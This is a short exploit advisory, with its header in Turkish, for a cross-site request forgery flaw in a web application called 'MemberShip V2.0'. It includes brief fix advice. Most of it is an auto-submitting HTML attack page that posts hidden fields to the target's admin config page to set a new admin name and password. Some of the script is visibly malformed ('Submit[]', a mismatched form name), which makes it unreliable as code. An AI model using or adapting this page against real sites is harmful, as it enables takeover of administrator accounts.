< ------------------- header data start ------------------- >

#############################################################

# Application Name : MemberShip V2.0

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=config id=config method=post

action=http://www.Site.com/admin/?page=config style=display:inline;>

<input name=CF_ADMINNAME type=text id=CF_ADMINNAME value=adminadd class=hiddenText>
<input name=CF_ADMINpassWORD type=text id=CF_ADMINpassWORD value=admin2008 class=hiddenText>

<input class=button type=submit name=submit value=create Admin />

< -- bug code end of -- >